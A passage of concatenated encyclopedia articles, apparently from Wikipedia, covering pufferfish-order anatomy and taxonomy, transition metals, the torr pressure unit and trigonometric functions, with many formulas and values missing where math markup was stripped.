over with skin, the only gill opening a small slit above the pectoral fin. The tetraodontiform strategy seems to be defense at the expense of speed, with all species fortified with scales modified into strong plates or spines – or with tough, leathery skin (the filefishes and ocean sunfish). Another striking defensive attribute found in the pufferfishes and porcupinefishes is the ability to inflate their bodies to greatly increase their normal diameter; this is accomplished by sucking water into a diverticulum of the stomach. Many species of the Tetraodontidae, Triodontidae, and Diodontidae are further protected from predation by tetrodotoxin, a powerful neurotoxin concentrated in the animals' internal organs. Tetraodontiforms have highly modified skeletons, with no nasal, parietal, infraorbital, or (usually) lower rib bones. The bones of the jaw are modified and fused into a sort of "beak"; visible sutures divide the beaks into "teeth". This is alluded to in their name, derived from the Greek words meaning "four" and meaning "tooth" and the Latin forma meaning "shape". Counting these teeth-like bones is a way of distinguishing similar families, for example, the Tetraodontidae ("four-toothed"), Triodontidae ("three-toothed"), and Diodontidae ("two-toothed"). Their jaws are aided by powerful muscles, and many species also have pharyngeal teeth to further process prey items, because the Tetraodontiformes prey mostly on hard-shelled invertebrates, such as crustaceans and shellfish. The Molidae are conspicuous even within this oddball order; they lack swim bladders and spines, and are propelled by their very tall dorsal and anal fins. The caudal peduncle is absent and the caudal fin is reduced to a stiff rudder-like structure. Molids are pelagic rather than reef-associated and feed on soft-bodied invertebrates, especially jellyfish. Families The Tetraodontiformes contains the following suborders and families: Suborder Plectocretacicoidei Tyler & Sorbini, 1996 Family Cretatriacanthidae Tyler & Sorbini, 1996 Family Plectocretacicidae Tyler & Sorbini, 1996 Family Protriacanthidae Tyler & Sorbini, 1996 Suborder Triodontoidei Bleeker, 1859 Genus †Ctenoplectus Close, Johanson, Tyler, Harrington & Friedman, 2016 Family Triodontidae Bleeker, 1859 Suborder Triacanthoidei Tyler, 1968 Family Triacanthodidae Gill, 1862 Subfamily Hollardiinae Tyler, 1968 Subfamily Triacanthodinae Gill, 1862 Family Triacanthidae Bleeker, 1859 Suborder Ostracioidea Rafinesque, 1810 Family †Spinacanthidae Santini & Tyler, 2003 Family Aracanidae Hollard, 1860 Family Ostraciidae Rafinesque, 1810 Suborder Balistoidei Rafinesque, 1810 Family Bolcabalistidae Santini & Tyler, 2003 Family Moclaybalistidae Santini & Tyler, 2003 Family Balistidae Rafinesque, 1810 Family Monacanthidae Nardo, 1843 Suborder Tetraodontoidei Berg, 1940 Genus †Iraniplectus Tyler, Mirzaie & Nazemi, 2006 Family †Avitoplectidae Bemis, Tyler, Bemis, Kumar, Rana & Smith, 2017 Family †Balkariidae Bannikov, Tyler, Arcila & Carnevale, 2016 Family †Eoplectidae Santini & Tyler, 2003 Family Molidae Bonaparte, 1835 Family Tetraodontidae Bonaparte, 1831 Subfamily Tetraodontinae Bonaparte, 1831 Subfamily Canthigastrinae Bleeker, 1865 Family Diodontidae Bonaparte, 1835 Family †Zignoichthyidae Tyler & Sorbini, 1996 means extinct. This cladogram of extant Tetraodontiformes is based on Santini et al., 2013. Timeline of genera
Biology and health sciences
Acanthomorpha
Animals
30364
https://en.wikipedia.org/wiki/Transition%20metal
Transition metal
In chemistry, a transition metal (or transition element) is a chemical element in the d-block of the periodic table (groups 3 to 12), though the elements of group 12 (and less often group 3) are sometimes excluded. The lanthanide and actinide elements (the f-block) are called inner transition metals and are sometimes considered to be transition metals as well. Since they are metals, they are lustrous and have good electrical and thermal conductivity. Most (with the exception of group 11 and group 12) are hard and strong, and have high melting and boiling temperatures. They form compounds in any of two or more different oxidation states and bind to a variety of ligands to form coordination complexes that are often coloured. They form many useful alloys and are often employed as catalysts in elemental form or in compounds such as coordination complexes and oxides. Most are strongly paramagnetic because of their unpaired d electrons, as are many of their compounds. All of the elements that are ferromagnetic near room temperature are transition metals (iron, cobalt and nickel) or inner transition metals (gadolinium). English chemist Charles Rugeley Bury (1890–1968) first used the word transition in this context in 1921, when he referred to a transition series of elements during the change of an inner layer of electrons (for example n = 3 in the 4th row of the periodic table) from a stable group of 8 to one of 18, or from 18 to 32. These elements are now known as the d-block. Definition and classification The 2011 IUPAC Principles of Chemical Nomenclature describe a "transition metal" as any element in groups 3 to 12 on the periodic table. This corresponds exactly to the d-block elements, and many scientists use this definition. In actual practice, the f-block lanthanide and actinide series are called "inner transition metals". The 2005 Red Book allows for the group 12 elements to be excluded, but not the 2011 Principles. The IUPAC Gold Book defines a transition metal as "an element whose atom has a partially filled d sub-shell, or which can give rise to cations with an incomplete d sub-shell", but this definition is taken from an old edition of the Red Book and is no longer present in the current edition. In the d-block, the atoms of the elements have between zero and ten d electrons. Published texts and periodic tables show variation regarding the heavier members of group 3. The common placement of lanthanum and actinium in these positions is not supported by physical, chemical, and electronic evidence, which overwhelmingly favour putting lutetium and lawrencium in those places. Some authors prefer to leave the spaces below yttrium blank as a third option, but there is confusion on whether this format implies that group 3 contains only scandium and yttrium, or if it also contains all the lanthanides and actinides; additionally, it creates a 15-element-wide f-block, when quantum mechanics dictates that the f-block should only be 14 elements wide. The form with lutetium and lawrencium in group 3 is supported by a 1988 IUPAC report on physical, chemical, and electronic grounds, and again by a 2021 IUPAC preliminary report as it is the only form that allows simultaneous (1) preservation of the sequence of increasing atomic numbers, (2) a 14-element-wide f-block, and (3) avoidance of the split in the d-block. Argumentation can still be found in the contemporary literature purporting to defend the form with lanthanum and actinium in group 3, but many authors consider it to be logically inconsistent (a particular point of contention being the differing treatment of actinium and thorium, which both can use 5f as a valence orbital but have no 5f occupancy as single atoms); the majority of investigators considering the problem agree with the updated form with lutetium and lawrencium. The group 12 elements zinc, cadmium, and mercury are sometimes excluded from the transition metals. This is because they have the electronic configuration [ ]d10s2, where the d shell is complete, and they still have a complete d shell in all their known oxidation states. The group 12 elements Zn, Cd and Hg may therefore, under certain criteria, be classed as post-transition metals in this case. However, it is often convenient to include these elements in a discussion of the transition elements. For example, when discussing the crystal field stabilization energy of first-row transition elements, it is convenient to also include the elements calcium and zinc, as both and have a value of zero, against which the value for other transition metal ions may be compared. Another example occurs in the Irving–Williams series of stability constants of complexes. Moreover, Zn, Cd, and Hg can use their d orbitals for bonding even though they are not known in oxidation states that would formally require breaking open the d-subshell, which sets them apart from the p-block elements. The 2007 (though disputed and so far not reproduced independently) synthesis of mercury(IV) fluoride () has been taken by some to reinforce the view that the group 12 elements should be considered transition metals, but some authors still consider this compound to be exceptional. Copernicium is expected to be able to use its d electrons for chemistry as its 6d subshell is destabilised by strong relativistic effects due to its very high atomic number, and as such is expected to have transition-metal-like behaviour and show higher oxidation states than +2 (which are not definitely known for the lighter group 12 elements). Even in bare dications, Cn2+ is predicted to be 6d87s2, unlike Hg2+ which is 5d106s0. Although meitnerium, darmstadtium, and roentgenium are within the d-block and are expected to behave as transition metals analogous to their lighter congeners iridium, platinum, and gold, this has not yet been experimentally confirmed. Whether copernicium behaves more like mercury or has properties more similar to those of the noble gas radon is not clear. Relative inertness of Cn would come from the relativistically expanded 7s–7p1/2 energy gap, which is already adumbrated in the 6s–6p1/2 gap for Hg, weakening metallic bonding and causing its well-known low melting and boiling points. Transition metals with lower or higher group numbers are described as 'earlier' or 'later', respectively. When described in a two-way classification scheme, early transition metals are on the left side of the d-block from group 3 to group 7. Late transition metals are on the right side of the d-block, from group 8 to 11 (or 12, if they are counted as transition metals). In an alternative three-way scheme, groups 3, 4, and 5 are classified as early transition metals, 6, 7, and 8 are classified as middle transition metals, and 9, 10, and 11 (and sometimes group 12) are classified as late transition metals. The heavy group 2 elements calcium, strontium, and barium do not have filled d-orbitals as single atoms, but are known to have d-orbital bonding participation in some compounds, and for that reason have been called "honorary" transition metals. Probably the same is true of radium. The f-block elements La–Yb and Ac–No have chemical activity of the (n−1)d shell, but importantly also have chemical activity of the (n−2)f shell that is absent in d-block elements. Hence they are often treated separately as inner transition elements. Electronic configuration The general electronic configuration of the d-block atoms is [noble gas](n − 1)d0–10ns0–2np0–1. Here "[noble gas]" is the electronic configuration of the last noble gas preceding the atom in question, and n is the highest principal quantum number of an occupied orbital in that atom. For example, Ti (Z = 22) is in period 4 so that n = 4, the first 18 electrons have the same configuration of Ar at the end of period 3, and the overall configuration is [Ar]3d24s2. The period 6 and 7 transition metals also add core (n − 2)f14 electrons, which are omitted from the tables below. The p orbitals are almost never filled in free atoms (the one exception being lawrencium due to relativistic effects that become important at such high Z), but they can contribute to the chemical bonding in transition metal compounds. The Madelung rule predicts that the inner d orbital is filled after the valence-shell s orbital. The typical electronic structure of transition metal atoms is then written as [noble gas]ns2(n − 1)dm. This rule is approximate, but holds for most of the transition metals. Even when it fails for the neutral ground state, it accurately describes a low-lying excited state. The d subshell is the next-to-last subshell and is denoted as (n − 1)d subshell. The number of s electrons in the outermost s subshell is generally one or two except palladium (Pd), with no electron in that s sub shell in its ground state. The s subshell in the valence shell is represented as the ns subshell, e.g. 4s. In the periodic table, the transition metals are present in ten groups (3 to 12). The elements in group 3 have an ns2(n − 1)d1 configuration, except for lawrencium (Lr): its 7s27p1 configuration exceptionally does not fill the 6d orbitals at all. The first transition series is present in the 4th period, and starts after Ca (Z = 20) of group 2 with the configuration [Ar]4s2, or scandium (Sc), the first element of group 3 with atomic number Z = 21 and configuration [Ar]4s23d1, depending on the definition used. As we move from left to right, electrons are added to the same d subshell till it is complete. Since the electrons added fill the (n − 1)d orbitals, the properties of the d-block elements are quite different from those of s and p block elements in which the filling occurs either in s or in p orbitals of the valence shell. The electronic configuration of the individual elements present in all the d-block series are given below: A careful look at the electronic configuration of the elements reveals that there are certain exceptions to the Madelung rule. For Cr as an example the rule predicts the configuration 3d44s2, but the observed atomic spectra show that the real ground state is 3d54s1. To explain such exceptions, it is necessary to consider the effects of increasing nuclear charge on the orbital energies, as well as the electron–electron interactions including both Coulomb repulsion and exchange energy. The exceptions are in any case not very relevant for chemistry because the energy difference between them and the expected configuration is always quite low. The (n − 1)d orbitals that are involved in the transition metals are very significant because they influence such properties as magnetic character, variable oxidation states, formation of coloured compounds etc. The valence s and p orbitals (ns and np) have very little contribution in this regard since they hardly change in the moving from left to the right in a transition series. In transition metals, there are greater horizontal similarities in the properties of the elements in a period in comparison to the periods in which the d orbitals are not involved. This is because in a transition series, the valence shell electronic configuration of the elements do not change. However, there are some group similarities as well. Characteristic properties There are a number of properties shared by the transition elements that are not found in other elements, which results from the partially filled d shell. These include the formation of compounds whose colour is due to d–d electronic transitions the formation of compounds in many oxidation states, due to the relatively low energy gap between different possible oxidation states the formation of many paramagnetic compounds due to the presence of unpaired d electrons. A few compounds of main-group elements are also paramagnetic (e.g. nitric oxide, oxygen) Most transition metals can be bound to a variety of ligands, allowing for a wide variety of transition metal complexes. Coloured compounds Colour in transition-series metal compounds is generally due to electronic transitions of two principal types. charge transfer transitions. An electron may jump from a predominantly ligand orbital to a predominantly metal orbital, giving rise to a ligand-to-metal charge-transfer (LMCT) transition. These can most easily occur when the metal is in a high oxidation state. For example, the colour of chromate, dichromate and permanganate ions is due to LMCT transitions. Another example is that mercuric iodide, HgI2, is red because of a LMCT transition. A metal-to-ligand charge transfer (MLCT) transition will be most likely when the metal is in a low oxidation state and the ligand is easily reduced. In general charge transfer transitions result in more intense colours than d–d transitions. d–d transitions. An electron jumps from one d orbital to another. In complexes of the transition metals the d orbitals do not all have the same energy. The pattern of splitting of the d orbitals can be calculated using crystal field theory. The extent of the splitting depends on the particular metal, its oxidation state and the nature of the ligands. The actual energy levels are shown on Tanabe–Sugano diagrams. In centrosymmetric complexes, such as octahedral complexes, d–d transitions are forbidden by the Laporte rule and only occur because of vibronic coupling in which a molecular vibration occurs together with a d–d transition. Tetrahedral complexes have somewhat more intense colour because mixing d and p orbitals is possible when there is no centre of symmetry, so transitions are not pure d–d transitions. The molar absorptivity (ε) of bands caused by d–d transitions are relatively low, roughly in the range 5-500 M−1cm−1 (where M = mol dm−3). Some d–d transitions are spin forbidden. An example occurs in octahedral, high-spin complexes of manganese(II), which has a d5 configuration in which all five electrons have parallel spins; the colour of such complexes is much weaker than in complexes with spin-allowed transitions. Many compounds of manganese(II) appear almost colourless. The spectrum of shows a maximum molar absorptivity of about 0.04 M−1cm−1 in the visible spectrum. Oxidation states A characteristic of transition metals is that they exhibit two or more oxidation states, usually differing by one. For example, compounds of vanadium are known in all oxidation states between −1, such as , and +5, such as . Main-group elements in groups 13 to 18 also exhibit multiple oxidation states. The "common" oxidation states of these elements typically differ by two instead of one. For example, compounds of gallium in oxidation states +1 and +3 exist in which there is a single gallium atom. Compounds of Ga(II) would have an unpaired electron and would behave as a free radical and generally be destroyed rapidly, but some stable radicals of Ga(II) are known. Gallium also has a formal oxidation state of +2 in dimeric compounds, such as , which contain a Ga-Ga bond formed from the unpaired electron on each Ga atom. Thus the main difference in oxidation states, between transition elements and other elements is that oxidation states are known in which there is a single atom of the element and one or more unpaired electrons. The maximum oxidation state in the first row transition metals is equal to the number of valence electrons from titanium (+4) up to manganese (+7), but decreases in the later elements. In the second row, the maximum occurs with ruthenium (+8), and in the third row, the maximum occurs with iridium (+9). In compounds such as and , the elements achieve a stable configuration by covalent bonding. The lowest oxidation states are exhibited in metal carbonyl complexes such as (oxidation state zero) and (oxidation state −2) in which the 18-electron rule is obeyed. These complexes are also covalent. Ionic compounds are mostly formed with oxidation states +2 and +3. In aqueous solution, the ions are hydrated by (usually) six water molecules arranged octahedrally. Magnetism Transition metal compounds are paramagnetic when they have one or more unpaired d electrons. In octahedral complexes with between four and seven d electrons both high spin and low spin states are possible. Tetrahedral transition metal complexes such as are high spin because the crystal field splitting is small so that the energy to be gained by virtue of the electrons being in lower energy orbitals is always less than the energy needed to pair up the spins. Some compounds are diamagnetic. These include octahedral, low-spin, d6 and square-planar d8 complexes. In these cases, crystal field splitting is such that all the electrons are paired up. Ferromagnetism occurs when individual atoms are paramagnetic and the spin vectors are aligned parallel to each other in a crystalline material. Metallic iron and the alloy alnico are examples of ferromagnetic materials involving transition metals. Antiferromagnetism is another example of a magnetic property arising from a particular alignment of individual spins in the solid state. Catalytic properties The transition metals and their compounds are known for their homogeneous and heterogeneous catalytic activity. This activity is ascribed to their ability to adopt multiple oxidation states and to form complexes. Vanadium(V) oxide (in the contact process), finely divided iron (in the Haber process), and nickel (in catalytic hydrogenation) are some of the examples. Catalysts at a solid surface (nanomaterial-based catalysts) involve the formation of bonds between reactant molecules and atoms of the surface of the catalyst (first row transition metals utilize 3d and 4s electrons for bonding). This has the effect of increasing the concentration of the reactants at the catalyst surface and also weakening of the bonds in the reacting molecules (the activation energy is lowered). Also because the transition metal ions can change their oxidation states, they become more effective as catalysts. An interesting type of catalysis occurs when the products of a reaction catalyse the reaction producing more catalyst (autocatalysis). One example is the reaction of oxalic acid with acidified potassium permanganate (or manganate (VII)). Once a little Mn2+ has been produced, it can react with MnO4− forming Mn3+. This then reacts with C2O4− ions forming Mn2+ again. Physical properties As implied by the name, all transition metals are metals and thus conductors of electricity. In general, transition metals possess a high density and high melting points and boiling points. These properties are due to metallic bonding by delocalized d electrons, leading to cohesion which increases with the number of shared electrons. However the group 12 metals have much lower melting and boiling points since their full d subshells prevent d–d bonding, which again tends to differentiate them from the accepted transition metals. Mercury has a melting point of and is a liquid at room temperature.
Physical sciences
Chemical element groups
null
30366
https://en.wikipedia.org/wiki/Torr
Torr
The torr (symbol: Torr) is a unit of pressure based on an absolute scale, defined as exactly of a standard atmosphere (101325 Pa). Thus one torr is exactly (≈ ). Historically, one torr was intended to be the same as one "millimeter of mercury", but subsequent redefinitions of the two units made the torr marginally lower (by less than 0.000015%). The torr is not part of the International System of Units (SI). Even so, it is often combined with the metric prefix milli to name one millitorr (mTorr), equal to 0.001 Torr. The unit was named after Evangelista Torricelli, an Italian physicist and mathematician who discovered the principle of the barometer in 1644. Nomenclature and common errors The unit name torr is written in lower case, while its symbol ("Torr") is always written with an uppercase initial; including in combinations with prefixes and other unit symbols, as in "mTorr" (millitorr) or "Torr⋅L/s" (torr-litres per second). The symbol (uppercase) should be used with prefix symbols (thus, mTorr and millitorr are correct, but mtorr and milliTorr are not). The torr is sometimes incorrectly denoted by the symbol "T", which is the SI symbol for the tesla, the unit measuring the strength of a magnetic field. Although frequently encountered, the alternative spelling "Tor" is incorrect. History Torricelli attracted considerable attention when he demonstrated the first mercury barometer to the general public. He is credited with giving the first modern explanation of atmospheric pressure. Scientists at the time were familiar with small fluctuations in height that occurred in barometers. When these fluctuations were explained as a manifestation of changes in atmospheric pressure, the science of meteorology was born. Over time, 760 millimeters of mercury at 0 °C came to be regarded as the standard atmospheric pressure. In honour of Torricelli, the torr was defined as a unit of pressure equal to one millimeter of mercury at 0 °C. However, since the acceleration due to gravity – and thus the weight of a column of mercury – is a function of elevation and latitude (due to the rotation and non-sphericity of the Earth), this definition is imprecise and varies by location. In 1954, the definition of the atmosphere was revised by the 10th General Conference on Weights and Measures to the currently accepted definition: one atmosphere is equal to 101325 pascals. The torr was then redefined as of one atmosphere. This yields a precise definition that is unambiguous and independent of measurements of the density of mercury or the acceleration due to gravity on Earth. Manometric units of pressure Manometric units are units such as millimeters of mercury or centimeters of water that depend on an assumed density of a fluid and an assumed acceleration due to gravity. The use of these units is discouraged. Nevertheless, manometric units are routinely used in medicine and physiology, and they continue to be used in areas as diverse as weather reporting and scuba diving. Conversion factors The millimeter of mercury by definition is 133.322387415 Pa (13.5951 g/cm3 × 9.80665 m/s2 × 1 mm), which is approximated with known accuracies of density of mercury and standard gravity. The torr is defined as of one standard atmosphere, while the atmosphere is defined as 101325 pascals. Therefore, 1 Torr is equal to  Pa. The decimal form of this fraction () is an infinitely long, periodically repeating decimal (repetend length: 18). The relationship between the torr and the millimeter of mercury is: 1 Torr = mmHg 1 mmHg = Torr The difference between one millimeter of mercury and one torr, as well as between one atmosphere (101.325 kPa) and 760 mmHg (101.3250144354 kPa), is less than one part in seven million (or less than 0.000015%). This small difference is negligible for all practical purposes. In the European Union, the millimeter of mercury is defined as 1 mmHg = 133.322 Pa hence 1 Torr = mmHg 1 mmHg = Torr Other units of pressure include: The bar (symbol: bar), defined as 100 kPa exactly. The atmosphere (symbol: atm), defined as 101.325 kPa exactly. These four pressure units are used in different settings. For example, the bar is used in meteorology to report atmospheric pressures. The torr is used in high-vacuum physics and engineering.
Physical sciences
Pressure
Basics and measurement
30367
https://en.wikipedia.org/wiki/Trigonometric%20functions
Trigonometric functions
In mathematics, the trigonometric functions (also called circular functions, angle functions or goniometric functions) are real functions which relate an angle of a right-angled triangle to ratios of two side lengths. They are widely used in all sciences that are related to geometry, such as navigation, solid mechanics, celestial mechanics, geodesy, and many others. They are among the simplest periodic functions, and as such are also widely used for studying periodic phenomena through Fourier analysis. The trigonometric functions most widely used in modern mathematics are the sine, the cosine, and the tangent functions. Their reciprocals are respectively the cosecant, the secant, and the cotangent functions, which are less used. Each of these six trigonometric functions has a corresponding inverse function, and an analog among the hyperbolic functions. The oldest definitions of trigonometric functions, related to right-angle triangles, define them only for acute angles. To extend the sine and cosine functions to functions whose domain is the whole real line, geometrical definitions using the standard unit circle (i.e., a circle with radius 1 unit) are often used; then the domain of the other functions is the real line with some isolated points removed. Modern definitions express trigonometric functions as infinite series or as solutions of differential equations. This allows extending the domain of sine and cosine functions to the whole complex plane, and the domain of the other trigonometric functions to the complex plane with some isolated points removed. Notation Conventionally, an abbreviation of each trigonometric function's name is used as its symbol in formulas. Today, the most common versions of these abbreviations are "sin" for sine, "cos" for cosine, "tan" or "tg" for tangent, "sec" for secant, "csc" or "cosec" for cosecant, and "cot" or "ctg" for cotangent. Historically, these abbreviations were first used in prose sentences to indicate particular line segments or their lengths related to an arc of an arbitrary circle, and later to indicate ratios of lengths, but as the function concept developed in the 17th–18th century, they began to be considered as functions of real-number-valued angle measures, and written with functional notation, for example . Parentheses are still often omitted to reduce clutter, but are sometimes necessary; for example the expression would typically be interpreted to mean so parentheses are required to express A positive integer appearing as a superscript after the symbol of the function denotes exponentiation, not function composition. For example and denote not This differs from the (historically later) general functional notation in which However, the exponent is commonly used to denote the inverse function, not the reciprocal. For example and denote the inverse trigonometric function alternatively written The equation implies not In this case, the superscript could be considered as denoting a composed or iterated function, but negative superscripts other than are not in common use. Right-angled triangle definitions If the acute angle is given, then any right triangles that have an angle of are similar to each other. This means that the ratio of any two side lengths depends only on . Thus these six ratios define six functions of , which are the trigonometric functions. In the following definitions, the hypotenuse is the length of the side opposite the right angle, opposite represents the side opposite the given angle , and adjacent represents the side between the angle and the right angle. Various mnemonics can be used to remember these definitions. In a right-angled triangle, the sum of the two acute angles is a right angle, that is, or . Therefore and represent the same ratio, and thus are equal. This identity and analogous relationships between the other trigonometric functions are summarized in the following table. Radians versus degrees In geometric applications, the argument of a trigonometric function is generally the measure of an angle. For this purpose, any angular unit is convenient. One common unit is degrees, in which a right angle is 90° and a complete turn is 360° (particularly in elementary mathematics). However, in calculus and mathematical analysis, the trigonometric functions are generally regarded more abstractly as functions of real or complex numbers, rather than angles. In fact, the functions and can be defined for all complex numbers in terms of the exponential function, via power series, or as solutions to differential equations given particular initial values (see below), without reference to any geometric notions. The other four trigonometric functions (, , , ) can be defined as quotients and reciprocals of and , except where zero occurs in the denominator. It can be proved, for real arguments, that these definitions coincide with elementary geometric definitions if the argument is regarded as an angle in radians. Moreover, these definitions result in simple expressions for the derivatives and indefinite integrals for the trigonometric functions. Thus, in settings beyond elementary geometry, radians are regarded as the mathematically natural unit for describing angle measures. When radians (rad) are employed, the angle is given as the length of the arc of the unit circle subtended by it: the angle that subtends an arc of length 1 on the unit circle is 1 rad (≈ 57.3°), and a complete turn (360°) is an angle of 2 (≈ 6.28) rad. For real number x, the notation , , etc. refers to the value of the trigonometric functions evaluated at an angle of x rad. If units of degrees are intended, the degree sign must be explicitly shown (, , etc.). Using this standard notation, the argument x for the trigonometric functions satisfies the relationship x = (180x/)°, so that, for example, when we take x = . In this way, the degree symbol can be regarded as a mathematical constant such that 1° = /180 ≈ 0.0175. Unit-circle definitions The six trigonometric functions can be defined as coordinate values of points on the Euclidean plane that are related to the unit circle, which is the circle of radius one centered at the origin of this coordinate system. While right-angled triangle definitions allow for the definition of the trigonometric functions for angles between and radians the unit circle definitions allow the domain of trigonometric functions to be extended to all positive and negative real numbers. Let be the ray obtained by rotating by an angle the positive half of the -axis (counterclockwise rotation for and clockwise rotation for ). This ray intersects the unit circle at the point The ray extended to a line if necessary, intersects the line of equation at point and the line of equation at point The tangent line to the unit circle at the point , is perpendicular to and intersects the - and -axes at points and The coordinates of these points give the values of all trigonometric functions for any arbitrary real value of in the following manner. The trigonometric functions and are defined, respectively, as the x- and y-coordinate values of point . That is, and In the range , this definition coincides with the right-angled triangle definition, by taking the right-angled triangle to have the unit radius as hypotenuse. And since the equation holds for all points on the unit circle, this definition of cosine and sine also satisfies the Pythagorean identity. The other trigonometric functions can be found along the unit circle as and and By applying the Pythagorean identity and geometric proof methods, these definitions can readily be shown to coincide with the definitions of tangent, cotangent, secant and cosecant in terms of sine and cosine, that is Since a rotation of an angle of does not change the position or size of a shape, the points , , , , and are the same for two angles whose difference is an integer multiple of . Thus trigonometric functions are periodic functions with period . That is, the equalities and hold for any angle and any integer . The same is true for the four other trigonometric functions. By observing the sign and the monotonicity of the functions sine, cosine, cosecant, and secant in the four quadrants, one can show that is the smallest value for which they are periodic (i.e., is the fundamental period of these functions). However, after a rotation by an angle , the points and already return to their original position, so that the tangent function and the cotangent function have a fundamental period of . That is, the equalities and hold for any angle and any integer . Algebraic values The algebraic expressions for the most important angles are as follows: (zero angle) (right angle) Writing the numerators as square roots of consecutive non-negative integers, with a denominator of 2, provides an easy way to remember the values. Such simple expressions generally do not exist for other angles which are rational multiples of a right angle. For an angle which, measured in degrees, is a multiple of three, the exact trigonometric values of the sine and the cosine may be expressed in terms of square roots. These values of the sine and the cosine may thus be constructed by ruler and compass. For an angle of an integer number of degrees, the sine and the cosine may be expressed in terms of square roots and the cube root of a non-real complex number. Galois theory allows a proof that, if the angle is not a multiple of 3°, non-real cube roots are unavoidable. For an angle which, expressed in degrees, is a rational number, the sine and the cosine are algebraic numbers, which may be expressed in terms of th roots. This results from the fact that the Galois groups of the cyclotomic polynomials are cyclic. For an angle which, expressed in degrees, is not a rational number, then either the angle or both the sine and the cosine are transcendental numbers. This is a corollary of Baker's theorem, proved in 1966. Simple algebraic values The following table lists the sines, cosines, and tangents of multiples of 15 degrees from 0 to 90 degrees. Definitions in analysis G. H. Hardy noted in his 1908 work A Course of Pure Mathematics that the definition of the trigonometric functions in terms of the unit circle is not satisfactory, because it depends implicitly on a notion of angle that can be measured by a real number. Thus in modern analysis, trigonometric functions are usually constructed without reference to geometry. Various ways exist in the literature for defining the trigonometric functions in a manner suitable for analysis; they include: Using the "geometry" of the unit circle, which requires formulating the arc length of a circle (or area of a sector) analytically. By a power series, which is particularly well-suited to complex variables. By using an infinite product expansion. By inverting the inverse trigonometric functions, which can be defined as integrals of algebraic or rational functions. As solutions of a differential equation. Definition by differential equations Sine and cosine can be defined as the unique solution to the initial value problem: Differentiating again, and , so both sine and cosine are solutions of the same ordinary differential equation Sine is the unique solution with and ; cosine is the unique solution with and . One can then prove, as a theorem, that solutions are periodic, having the same period. Writing this period as is then a definition of the real number which is independent of geometry. Applying the quotient rule to the tangent , so the tangent function satisfies the ordinary differential equation It is the unique solution with . Power series expansion The basic trigonometric functions can be defined by the following power series expansions. These series are also known as the Taylor series or Maclaurin series of these trigonometric functions: The radius of convergence of these series is infinite. Therefore, the sine and the cosine can be extended to entire functions (also called "sine" and "cosine"), which are (by definition) complex-valued functions that are defined and holomorphic on the whole complex plane. Term-by-term differentiation shows that the sine and cosine defined by the series obey the differential equation discussed previously, and conversely one can obtain these series from elementary recursion relations derived from the differential equation. Being defined as fractions of entire functions, the other trigonometric functions may be extended to meromorphic functions, that is functions that are holomorphic in the whole complex plane, except some isolated points called poles. Here, the poles are the numbers of the form for the tangent and the secant, or for the cotangent and the cosecant, where is an arbitrary integer. Recurrences relations may also be computed for the coefficients of the Taylor series of the other trigonometric functions. These series have a finite radius of convergence. Their coefficients have a combinatorial interpretation: they enumerate alternating permutations of finite sets. More precisely, defining , the th up/down number, , the th Bernoulli number, and , is the th Euler number, one has the following series expansions: Continued fraction expansion The following continued fractions are valid in the whole complex plane: The last one was used in the historically first proof that π is irrational. Partial fraction expansion There is a series representation as partial fraction expansion where just translated reciprocal functions are summed up, such that the poles of the cotangent function and the reciprocal functions match: This identity can be proved with the Herglotz trick. Combining the th with the th term lead to absolutely convergent series: Similarly, one can find a partial fraction expansion for the secant, cosecant and tangent functions: Infinite product expansion The following infinite product for the sine is due to Leonhard Euler, and is of great importance in complex analysis: This may be obtained from the partial fraction decomposition of given above, which is the logarithmic derivative of . From this, it can be deduced also that Euler's formula and the exponential function Euler's formula relates sine and cosine to the exponential function: This formula is commonly considered for real values of , but it remains true for all complex values. Proof: Let and One has for . The quotient rule implies thus that . Therefore, is a constant function, which equals , as This proves the formula. One has Solving this linear system in sine and cosine, one can express them in terms of the exponential function: When is real, this may be rewritten as Most trigonometric identities can be proved by expressing trigonometric functions in terms of the complex exponential function by using above formulas, and then using the identity for simplifying the result. Euler's formula can also be used to define the basic trigonometric function directly, as follows, using the language of topological groups. The set of complex numbers of unit modulus is a compact and connected topological group, which has a neighborhood of the identity that is homeomorphic to the real line. Therefore, it is isomorphic as a topological group to the one-dimensional torus group , via an isomorphism In pedestrian terms , and this isomorphism is unique up to taking complex conjugates. For a nonzero real number (the base), the function defines an isomorphism of the group . The real and imaginary parts of are the cosine and sine, where is used as the base for measuring angles. For example, when , we get the measure in radians, and the usual trigonometric functions. When , we get the sine and cosine of angles measured in degrees. Note that is the unique value at which the derivative becomes a unit vector with positive imaginary part at . This fact can, in turn, be used to define the constant . Definition via integration Another way to define the trigonometric functions in analysis is using integration. For a real number , put where this defines this inverse tangent function. Also, is defined by a definition that goes back to Karl Weierstrass. On the interval , the trigonometric functions are defined by inverting the relation . Thus we define the trigonometric functions by where the point is on the graph of and the positive square root is taken. This defines the trigonometric functions on . The definition can be extended to all real numbers by first observing that, as , , and so and . Thus and are extended continuously so that . Now the conditions and define the sine and cosine as periodic functions with period , for all real numbers. Proving the basic properties of sine and cosine, including the fact that sine and cosine are analytic, one may first establish the addition formulae. First, holds, provided , since after the substitution . In particular, the limiting case as gives Thus we have and So the sine and cosine functions are related by translation over a quarter period . Definitions using functional equations One can also define the trigonometric functions using various functional equations. For example, the sine and the cosine form the unique pair of continuous functions that satisfy the difference formula and the added condition In the complex plane The sine and cosine of a complex number can be expressed in terms of real sines, cosines, and hyperbolic functions as follows: By taking advantage of domain coloring, it is possible to graph the trigonometric functions as complex-valued functions. Various features unique to the complex functions can be seen from the graph; for example, the sine and cosine functions can be seen to be unbounded as the imaginary part of becomes larger (since the color white represents infinity), and the fact that the functions contain simple zeros or poles is apparent from the fact that the hue cycles around each zero or pole exactly once. Comparing these graphs with those of the corresponding Hyperbolic functions highlights the relationships between the two. Periodicity and asymptotes The cosine and sine functions are periodic, with period , which is the smallest positive period: Consequently, the secant and cosecant also have as their period. The functions sine and cosine also have semiperiods , and and consequently Also, The function has a unique zero (at ) in the strip . The function has the pair of zeros in the same strip. Because of the periodicity, the zeros of sine are There zeros of cosine are All of the zeros are simple zeros, and both functions have derivative at each of the zeros. The tangent function has a simple zero at and vertical asymptotes at , where it has a simple pole of residue . Again, owing to the periodicity, the zeros are all the integer multiples of and the poles are odd multiples of , all having the same residue. The poles correspond to vertical asymptotes The cotangent function has a simple pole of residue 1 at the integer multiples of and simple zeros at odd multiples of . The poles correspond to vertical asymptotes Basic identities Many identities interrelate the trigonometric functions. This section contains the most basic ones; for more identities, see List of trigonometric identities. These identities may be proved geometrically from the unit-circle definitions or the right-angled-triangle definitions (although, for the latter definitions, care must be taken for angles that are not in the interval , see Proofs of trigonometric identities). For non-geometrical proofs using only tools of calculus, one may use directly the differential 